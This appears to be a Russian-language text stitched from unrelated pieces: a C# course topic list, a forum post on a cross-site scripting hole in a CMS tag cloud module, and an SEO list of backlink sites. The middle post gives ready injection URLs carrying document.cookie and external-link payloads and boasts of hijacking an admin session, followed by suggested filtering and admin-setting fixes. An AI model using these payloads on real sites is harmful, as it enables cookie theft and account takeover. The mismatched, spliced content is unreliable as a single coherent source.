1)Типы данных, литералы и переменные (типы значений, целочисленные типы, типы для представления чисел с плавающей точкой, символы, логический тип, литералы; инициализация переменной, неявно типизированные переменные, область действия и время существования переменных, приведения типов). 2) операторы (арифметические операторы, операторы отношения и логические операторы, оператор присваивания, оператор ?) 3) управляющие операторы (if, switch, for, while, do-while, foreach, break, continue, return). 4) массивы и строки (виды массивов, инициализация массивов, неявно типизированные массивы; постоянство строк). 5) классы, объекты и методы (общая форма определения класса, создание объектов, конструкторы, оператор new, сборка мусора, модификация доступа, инициализация объектов, рекурсия, псевдорекурсия, статические классы). 6) методы (использование параметров метода, модификаторы параметров ref и out, использование переменного числа аргументов, перегрузка методов, необязательные аргументы, метод Main(), статические методы) 7) перегрузка операторов (перегрузка унарных и бинарных операторов, операторов отношения, true и false, логических операторов, операторов преобразования). 8) индексаторы и свойства (одномерные и многомерные индексаторы, перегрузка индексаторов; автосвойства, модификаторы доступа в аксессорах). 9)наследование (организация защищенного доступа, конструкторы и наследование, сокрытие имен, виртуальные методы, абстрактные классы, ключевое слово sealed, класс object, упаковка и распаковка). 10) интерфейсы (реализация, применение интерфейсных ссылок, наследование интерфейсов, явные реализации). 11) структуры и перечисления 12) обработка исключительных ситуаций (класс System.Exception,ключевые слова try, catch, throw, finally). 13)делегаты и события (объявление делегатов, групповая адресация, ковариантность и контрвариантность, анонимные методы, события, групповая адресация события, аксессоры событий). 14) обобщения (объявление, ограниченные типы, полученные значения, присваиваемого параметру типа по умолчанию, обобщенный метод, вариантные делегаты). |
обнаружена очередная уязвимость в популярной CMS.
Воспользуемся недостаточной фильтрацией в модуле "Теги". Использование уязвимости: У нас два варианта, Первый, по HTML, второй через XSS. Да, дырка настолько большая что и простой html отрабатывает так как нам нужно. вход на сайт XSS: Code http://сайт.ру/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=<tags><a+href='javascript:alert(document.cookie)'+style='font-size:+50pt'>Click me</a></tags> вход на сайт простым HTML: Code http://сайт.ру/engine/classes/tagcloud/tagcloud.swf?mode=tags&tagcloud=<tags><a+href='http://ssfera.ru'+style='font-size:+40pt'>Click me</a></tags> С помощью данного метода мы можем получить сессию админа, вытащить куки, успешно залогиньться и сотворить бяку противнику. Пути решения проблемы: Вариант от -=BlackSmoke=- : Code заинглудь в файл класс парсинга входящих данных(parse.class.php) и с помощью него сделай фильтрацию. Что-то типа $tags = $db->safesql( htmlspecialchars( strip_tags( stripslashes( trim( $_GET['tagcloud'] ) ) ), ENT_QUOTES ) ); Топорный метод от xex: Code а еще можно и нужно в настройках админки иметь такой расклад: Метод авторизации в админпанели = Расширенный метод + для надежности и большей параноидальности Контроль изменения IP адреса = Высокий уровень Сбрасывать ключ авторизации при каждом входе? = Да (ну и надеюсь админка не [b]admin.php[/b] называется + я себе даже в [b].htaccess[/b] админку разрешил только с одного ИП ) [b]и кража кук будет бесполезна[/b] |
Список жирных ссылок с высоким и не очень ТИЦ и PR.
Для чего они нужны? Все очень просто, разместив обратную ссылку на свой сайт или блог с ресурса с высоким ТИЦ и PR вы повышаете свой ранг в поисковых системах. Ссылки с ресурсов с высоким ТИЦ и PR дадут прирост индекса цитируемости и Page Rank для вашего ресурса. Ниже привожу список и краткое описание для получения обратной ссылки. Не рекомендую оставлять более 3-5 ссылок в сутки! Ведь для поисковиков это очень важно, в противном случае они просто могут быть не учтены и ваш сайт или блог попросту забанят, если заподозрят вас в спаме. ТИЦ 1700 PR3 http://smi2.ru/ надо зарегистрироваться и в профиле указать адрес вашего сайта без nofollow и Noindex, так же можно разместить грамотную публикацию и получить дополнительных посетителей на сайт. На сегодня пока все, что-то в подобных списках копаюсь очень много мусора и блогов с Noindex и Nofollow. |